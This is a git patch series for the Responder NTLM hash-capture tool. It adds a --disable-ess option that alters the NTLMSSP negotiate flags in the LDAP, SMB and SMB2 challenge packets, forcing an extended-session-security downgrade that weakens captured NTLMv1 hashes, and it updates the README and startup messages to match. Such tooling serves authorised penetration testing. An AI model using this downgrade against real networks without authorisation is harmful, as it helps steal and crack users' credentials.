From baf80aa4f0e1aaf9ee81ffe6b0b5089d39f42516 Mon Sep 17 00:00:00 2001 From: pixis Date: Fri, 14 May 2021 11:45:18 +0200 Subject: [PATCH 1/3] Add ESS downgrade parameter --- README.md | 1 + Responder.py | 1 + packets.py | 6 +++--- settings.py | 1 + utils.py | 1 + 5 files changed, 7 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 44a8baa..bc14d7c 100644 --- a/README.md +++ b/README.md @@ -163,6 +163,7 @@ Options: with -r. Default: Off --lm Force LM hashing downgrade for Windows XP/2003 and earlier. Default: Off + --disable-ess Force ESS downgrade. Default: Off -v, --verbose Increase verbosity. diff --git a/Responder.py b/Responder.py index 2b62977..302bdf1 100755 --- a/Responder.py +++ b/Responder.py @@ -43,6 +43,7 @@ parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM parser.add_option('-P','--ProxyAuth', action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False) parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False) +parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False) parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose") options, args = parser.parse_args() diff --git a/packets.py b/packets.py index 77036bd..4f5acb3 100644 --- a/packets.py +++ b/packets.py @@ -791,7 +791,7 @@ class LDAPNTLMChallenge(Packet): ("NTLMSSPNtWorkstationLen", "\x1e\x00"), ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"), ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"), - ("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"), + ("NTLMSSPNtNegotiateFlags", "\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"), ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"), ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), ("NTLMSSPNtTargetInfoLen", "\x94\x00"), @@ -1331,7 +1331,7 @@ class SMBSession1Data(Packet): ("NTLMSSPNtWorkstationLen","\x1e\x00"), ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"), ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"), - ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"), + ("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"), ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"), ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"), ("NTLMSSPNtTargetInfoLen","\x94\x00"), @@ -1651,7 +1651,7 @@ class SMB2Session1Data(Packet): ("NTLMSSPNtWorkstationLen","\x1e\x00"), ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"), ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"), - ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"), + ("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"), ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"), ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"), ("NTLMSSPNtTargetInfoLen","\x94\x00"), diff --git a/settings.py b/settings.py index b96f127..3c02527 100644 --- a/settings.py +++ b/settings.py @@ -176,6 +176,7 @@ class Settings: # CLI options self.ExternalIP = options.ExternalIP self.LM_On_Off = options.LM_On_Off + self.NOESS_On_Off = options.NOESS_On_Off self.WPAD_On_Off = options.WPAD_On_Off self.Wredirect = options.Wredirect self.NBTNSDomain = options.NBTNSDomain diff --git a/utils.py b/utils.py index 7a71c83..7045d18 100644 --- a/utils.py +++ b/utils.py @@ -403,6 +403,7 @@ def StartupMessage(): print(' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled)) print(' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled)) print(' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled)) + print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True else disabled)) print(' %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled)) print('') From 51f8ab43682973df32534ca97c99fb1318a0c77d Mon Sep 17 00:00:00 2001 From: Pixis Date: Sun, 16 May 2021 09:54:21 +0200 Subject: [PATCH 2/3] Add ESS disabling information --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index bc14d7c..9f09906 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ The concept behind this is to target our answers, and be stealthier on the netwo - Built-in SMB Auth server. -Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default. +Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. If --disable-ess is set, extended session security will be disabled for NTLMv1 authentication. SMBv2 has also been implemented and is supported by default. - Built-in MSSQL Auth server. From dcb80d992e385a0f0fdd3f724a0b040a42439306 Mon Sep 17 00:00:00 2001 From: Pixis Date: Sun, 16 May 2021 09:55:32 +0200 Subject: [PATCH 3/3] Add --lm switch for ESS downgrade --- utils.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/utils.py b/utils.py index 7045d18..f805279 100644 --- a/utils.py +++ b/utils.py @@ -403,7 +403,7 @@ def StartupMessage(): print(' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled)) print(' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled)) print(' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled)) - print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True else disabled)) + print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True or settings.Config.LM_On_Off == True else disabled)) print(' %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled)) print('')